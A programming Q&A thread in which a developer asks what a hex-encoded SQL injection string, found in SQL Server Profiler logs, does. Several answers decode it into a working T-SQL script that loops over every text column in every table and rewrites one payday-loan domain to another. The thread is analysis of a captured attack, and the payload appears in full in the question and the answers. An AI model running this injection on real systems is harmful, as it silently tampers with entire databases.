# What does it do.?

Tags: sql, sql-injection

I recently found a cause for SQL Injection in my application with the help of SQL Profiler:

And the cause say this:

> SELECT * FROM tbl_posting_job_info where job_posting_id=33131 declare @s varchar(8000) set @s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d5245504c414345285b272b40432b275d2c2027276164616d7061796461796c6f616e732e636f6d27272c202727647265777061796461796c6f616e732e636f6d272729207768657265205b272b40432b275d206c696b65202727256164616d7061796461796c6f616e732e636f6d252727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 as varchar(8000)) exec(@s)

Which gets passed as a Query String.

So can anyone tell me what it says..?

Answer (score 2, accepted):

`Exec` can execute SQL code passed as a string. So they sort of obfuscated the string into hex codes of chars, to make it less readable for you. If you convert it from hex to text it gives:

```
set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+'] like ''%adampaydayloans.com%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
```

Formatted version:

```
SET ansi_warnings OFF 

DECLARE @T VARCHAR(255), 
        @C VARCHAR(255) 
DECLARE table_cursor CURSOR FOR 
  SELECT c.table_name, 
         c.column_name 
  FROM   information_schema.columns c, 
         information_schema.tables t 
  WHERE  c.data_type IN ( 'nvarchar', 'varchar', 'ntext', 'text' ) 
         AND c.character_maximum_length > 10 
         AND t.table_name = c.table_name 
         AND t.table_type = 'BASE TABLE' 

OPEN table_cursor 

FETCH next FROM table_cursor INTO @T, @C 

WHILE( @@FETCH_STATUS = 0 ) 
  BEGIN 
      EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+ 
      '], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+ 
      '] like ''%adampaydayloans.com%'' ') 

      FETCH next FROM table_cursor INTO @T, @C 
  END 

CLOSE table_cursor 

DEALLOCATE table_cursor
```

Comment: Will it affect every table with the same query because multiple tables are affected in the database.??

Comment: @VishalSuthar it will affect all table, because it goes over every table in db, because it goes over `information_schema.tables`

Comment: @VishalSuthar not exactly what I said. It will affect every table that has at least one column with type 'nvarchar', 'varchar', 'ntext', 'text'. Basically it tries to change domain names of email addresses.

Answer (score 1):

The string is the hex encoded version of

> set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+'] like ''%adampaydayloans.com%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

I've used http://home.paulschou.net/tools/xlate/ to decode it.

[Nicely formatted](http://www.dpriver.com/pp/sqlformat.htm), the SQL code is as follows:

```
SET ansi_warnings OFF 

DECLARE @T VARCHAR(255), 
        @C VARCHAR(255) 
DECLARE table_cursor CURSOR FOR 
  SELECT c.table_name, 
         c.column_name 
  FROM   information_schema.columns c, 
         information_schema.tables t 
  WHERE  c.data_type IN ( 'nvarchar', 'varchar', 'ntext', 'text' ) 
         AND c.character_maximum_length > 10 
         AND t.table_name = c.table_name 
         AND t.table_type = 'BASE TABLE' 

OPEN table_cursor 

FETCH next FROM table_cursor INTO @T, @C 

WHILE( @@FETCH_STATUS = 0 ) 
  BEGIN 
      EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+ 
      '], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+ 
      '] like ''%adampaydayloans.com%'' ') 

      FETCH next FROM table_cursor INTO @T, @C 
  END 

CLOSE table_cursor 

DEALLOCATE table_cursor
```

Comment: Will it affect multiple table with the same query because multiple tables are affected in the database.??

Comment: @VishalSuthar: By the look of things, it can potentially modify every table in the schema.

Answer (score 0):

```
    SELECT cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d5245504c414345285b272b40432b275d2c2027276164616d7061796461796c6f616e732e636f6d27272c202727647265777061796461796c6f616e732e636f6d272729207768657265205b272b40432b275d206c696b65202727256164616d7061796461796c6f616e732e636f6d252727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 as varchar(8000))
```

yields:

```
set ansi_warnings off 
DECLARE @T VARCHAR(255),@C VARCHAR(255) 
DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from     
INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t 
where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and 
c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE 
TABLE' 

OPEN Table_Cursor 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) 
BEGIN 
EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', 
''drewpaydayloans.com'') where ['+@C+'] like ''%adampaydayloans.com%'' ') 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
END 

CLOSE Table_Cursor 
DEALLOCATE Table_Cursor
```

Essentially, it is checking tables for the occurrence of the string `adampaydayloans.com`, and replaces it with another value, `drewpaydayloans.com`.

Comment: Thanks, SchmitzIT for the answer..!!

Answer (score 0):

If you execute the query below in your db

```
select cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d5245504c414345285b272b40432b275d2c2027276164616d7061796461796c6f616e732e636f6d27272c202727647265777061796461796c6f616e732e636f6d272729207768657265205b272b40432b275d206c696b65202727256164616d7061796461796c6f616e732e636f6d252727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 as varchar(8000))
```

you will get

```
set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+'] like ''%adampaydayloans.com%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
```

You should validate if the **job_posting_id** is a number before executing queries so one can not inject their code.

Comment: Thanks Maras for the Help.!! and yes, I have to validate `job_posting_id`

Answer (score 0):

Using this:

http://www.dolcevie.com/js/converter.html

It looks like the hex passed in gets turned into this

```
set ansi_warnings off 
DECLARE @T VARCHAR(255),@C VARCHAR(255) 
DECLARE Table_Cursor CURSOR FOR 
select c.TABLE_NAME,
       c.COLUMN_NAME 
from INFORMATION_SCHEMA.columns c, 
INFORMATION_SCHEMA.tables t 
where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') 
and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name 
and t.table_type='BASE TABLE' 


OPEN Table_Cursor 
FETCH NEXT 
FROM Table_Cursor 
INTO @T,@C 

WHILE(@@FETCH_STATUS=0) 
BEGIN 
  EXEC(
    'UPDATE ['+@T+'] 
    SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', ''drewpaydayloans.com'')
    where ['+@C+'] like ''%adampaydayloans.com%'' 
  ') 

  FETCH NEXT FROM Table_Cursor 
  INTO @T,@C 
END 

CLOSE Table_Cursor 
DEALLOCATE Table_Cursor
```

so it looks like some shady payday loans type is trying to change all varchar/text fields in your db that contain links to some competitor to contain links to their payday loan site instead.